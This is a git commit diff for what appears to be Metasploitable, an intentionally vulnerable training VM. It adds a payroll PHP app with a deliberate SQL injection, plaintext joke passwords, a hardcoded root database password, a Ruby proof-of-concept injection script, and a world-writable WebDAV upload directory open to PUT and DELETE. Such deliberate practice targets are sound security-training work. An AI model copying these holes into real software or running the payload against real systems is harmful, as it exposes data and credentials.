Bring linux/cups up to date

2017-04-19 16:25:35 -05:00 · 2017-04-19 16:25:35 -05:00 · 41d86d73a3
parent 8939a3d84f 71688d59f6
commit 41d86d73a3
8 changed files with 233 additions and 7 deletions
--- a/1
+++ b/1
@ -170,6 +170,7 @@ Vagrant.configure("2") do |config|
      chef.add_recipe "metasploitable::samba"
      chef.add_recipe "metasploitable::unrealircd"
      chef.add_recipe "metasploitable::cups"
+      chef.add_recipe "metasploitable::payroll_app"
    end
  end
 end
--- a/chef/cookbooks/metasploitable/files/apache/dav.conf
+++ b/chef/cookbooks/metasploitable/files/apache/dav.conf
@ -0,0 +1,39 @@
+#
+# Distributed authoring and versioning (WebDAV)
+#
+# Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias
+#                   mod_auth_digest, mod_authn_file
+#
+
+# The following example gives DAV write access to a directory called
+# "uploads" under the ServerRoot directory.
+#
+# The User/Group specified in httpd.conf needs to have write permissions
+# on the directory where the DavLockDB is placed and on any directory where
+# "Dav On" is specified.
+
+Alias /uploads "/var/www/uploads"
+
+<Directory "/var/www/uploads">
+    AllowOverride All
+    Dav On
+
+    <Limit GET HEAD POST DELETE OPTIONS PUT>
+        Order Allow,Deny
+        Allow from all
+    </Limit>
+</Directory>
+
+#
+# The following directives disable redirects on non-GET requests for
+# a directory that does not include the trailing slash.  This fixes a
+# problem with several clients that do not appropriately handle
+# redirects for folders with DAV methods.
+#
+BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully
+BrowserMatch "MS FrontPage" redirect-carefully
+BrowserMatch "^WebDrive" redirect-carefully
+BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully
+BrowserMatch "^gnome-vfs/1.0" redirect-carefully
+BrowserMatch "^XML Spy" redirect-carefully
+BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully
--- a/chef/cookbooks/metasploitable/files/payroll_app/payroll.sql
+++ b/chef/cookbooks/metasploitable/files/payroll_app/payroll.sql
@ -0,0 +1,60 @@
+-- phpMyAdmin SQL Dump
+-- version 3.5.8
+-- http://www.phpmyadmin.net
+--
+-- Host: 127.0.0.1
+-- Generation Time: Apr 10, 2017 at 04:42 PM
+-- Server version: 5.5.54-0ubuntu0.14.04.1
+-- PHP Version: 5.4.5
+
+SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
+SET time_zone = "+00:00";
+
+
+/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
+/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
+/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
+/*!40101 SET NAMES utf8 */;
+
+--
+-- Database: `payroll`
+--
+
+-- --------------------------------------------------------
+
+--
+-- Table structure for table `users`
+--
+
+CREATE TABLE IF NOT EXISTS `users` (
+  `username` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
+  `first_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
+  `last_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
+  `password` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
+  `salary` int(20) NOT NULL
+) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
+
+--
+-- Dumping data for table `users`
+--
+
+INSERT INTO `users` (`username`, `first_name`, `last_name`, `password`, `salary`) VALUES
+('luke_skywalker', 'Luke', 'Skywalker', 'password', 102000),
+('leia_organa', 'Leia', 'Organa', 'obiwan', 95600),
+('han_solo', 'Han', 'Solo', 'sh00t-first', 12000),
+('artoo_detoo', 'Artoo', 'Detoo', 'beep_b00p', 22000),
+('c_three_pio', 'C', 'Threepio', 'pr0t0c0l', 32000),
+('ben_kenobi', 'Ben', 'Kenobi', 'thats_no_moon', 1000000),
+('darth_vader', 'Darth', 'Vader', 'd@rk_sid3', 666000),
+('anakin_skywalker', 'Anakin', 'Skywalker', 'yipp33!!', 0),
+('jarjar_binks', 'Jar-Jar', 'Binks', 'mesah_p@ssw0rd', 2000),
+('lando_calrissian', 'Lando', 'Calrissian', 'b@ckstab', 4000000),
+('boba_fett', 'Boba', 'Fett', 'mandalorian1', 2000000),
+('jabba_hutt', 'Jabba', 'The Hutt', 'not-a-slug12', 10000000),
+('greedo', 'Greedo', 'Rodian', 'hanShotFirst!', 500000),
+('chewbacca', 'Chewbacca', '', 'rwaaaaawr5', 4500),
+('kylo_ren', 'Kylo', 'Ren', 'daddy_issues1', 66600);
+
+/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
+/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
+/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
--- a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
+++ b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
@ -0,0 +1,64 @@
+<?php
+
+$conn = new mysqli('127.0.0.1', 'root', 'sploitme', 'payroll');
+if ($conn->connect_error) {
+    die("Connection failed: " . $conn->connect_error);
+}
+?>
+
+<?php
+if (!isset($_POST['s'])) {
+?>
+<center>
+<form action="" method="post">
+<h2>Payroll Login</h2>
+<table style="border-radius: 25px; border: 2px solid black; padding: 20px;">
+    <tr>
+        <td>User</td>
+        <td><input type="text" name="user"></td>
+    </tr>
+    <tr>
+        <td>Password</td>
+        <td><input type="password" name="password"></td>
+    </tr>
+    <tr>
+       <td><input type="submit" value="OK" name="s">
+    </tr>
+</table>
+</form>
+</center>
+<?php
+}
+?>
+
+<?php
+if($_POST['s']){
+    $user = $_POST['user'];
+    $pass = $_POST['password'];
+    $sql = "select username, first_name, last_name, salary from users where username = '$user' and password = '$pass'";
+
+    if ($conn->multi_query($sql)) {
+        do {
+            /* store first result set */
+            echo "<center>";
+            echo "<h2>Welcome, " . $user . "</h2><br>";
+            echo "<table style='border-radius: 25px; border: 2px solid black;' cellspacing=30>";
+            echo "<tr><th>Username</th><th>First Name</th><th>Last Name</th><th>Salary</th></tr>";
+            if ($result = $conn->store_result()) {
+                while ($row = $result->fetch_assoc()) {
+                    $keys = array_keys($row);
+                    echo "<tr>";
+                    foreach ($keys as $key) {
+                        echo "<td>" . $row[$key] . "</td>";
+                    }
+                    echo "</tr>\n";
+                }
+                $result->free();
+            }
+            if (!$conn->more_results()) {
+                echo "</table></center>";
+            }
+        } while ($conn->next_result());
+    }
+}
+?>
--- a/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@ -0,0 +1,14 @@
+require 'net/http'
+
+url  = "http://127.0.0.1/payroll_app.php"
+uri  = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"
--- a/chef/cookbooks/metasploitable/recipes/apache.rb
+++ b/chef/cookbooks/metasploitable/recipes/apache.rb
@ -17,6 +17,11 @@ directory '/var/www/cgi-bin' do
  recursive true
 end

+directory '/var/www/uploads' do
+  mode '0777'
+  recursive true
+end
+
 cookbook_file '/var/www/cgi-bin/hello_world.sh' do
  source 'apache/hello_world.sh'
  mode '0755'
@ -27,16 +32,27 @@ cookbook_file '/etc/apache2/conf-available/cgi-bin.conf' do
  mode '0644'
 end

-execute 'enable-cgi-mod' do
-  command 'a2enmod cgi'
+cookbook_file '/etc/apache2/conf-available/dav.conf' do
+  source 'apache/dav.conf'
+  mode '0644'
 end

-execute 'enable-cgi-bin-conf' do
-  command 'a2enconf cgi-bin'
+bash "configure cgi" do
+  code <<-EOH
+    a2enmod cgi
+    a2enconf cgi-bin
+    a2disconf serve-cgi-bin
+  EOH
 end

-execute 'disable-serve-cgi-bin-conf' do
-  command 'a2disconf serve-cgi-bin'
+bash "configure webDAV" do
+  code <<-EOH
+    a2enmod dav
+    a2enmod dav_fs
+    a2enmod dav_lock
+    a2enmod auth_digest
+    a2enconf dav
+  EOH
 end

 execute 'make /var/www/html writeable' do
--- a/chef/cookbooks/metasploitable/recipes/payroll_app.rb
+++ b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
@ -0,0 +1,32 @@
+#
+# Cookbook:: metasploitable
+# Recipe:: payroll_app
+# Copyright:: 2017, Rapid7, All Rights Reserved.
+
+cookbook_file '/var/www/html/payroll_app.php' do
+  source 'payroll_app/payroll_app.php'
+  mode '0755'
+end
+
+cookbook_file '/tmp/payroll.sql' do
+  source 'payroll_app/payroll.sql'
+  mode '0755'
+end
+
+directory '/home/vagrant/poc/payroll_app/' do
+  mode '0755'
+  owner 'vagrant'
+  recursive true
+end
+
+cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
+  source 'payroll_app/poc.rb'
+  mode '0755'
+end
+
+bash 'create payroll database and import data' do
+  code <<-EOH
+    mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
+    mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" payroll < /tmp/payroll.sql
+  EOH
+end
--- a/chef/cookbooks/metasploitable/recipes/php_545.rb
+++ b/chef/cookbooks/metasploitable/recipes/php_545.rb
@ -35,7 +35,7 @@ end
 bash "compile and install php" do
  code <<-EOH
    cd /home/vagrant/php-5.4.5
-    ./configure --with-apxs2=/usr/bin/apxs --with-mysql
+    ./configure --with-apxs2=/usr/bin/apxs --with-mysqli --enable-embedded-mysqli
    make
    make install
  EOH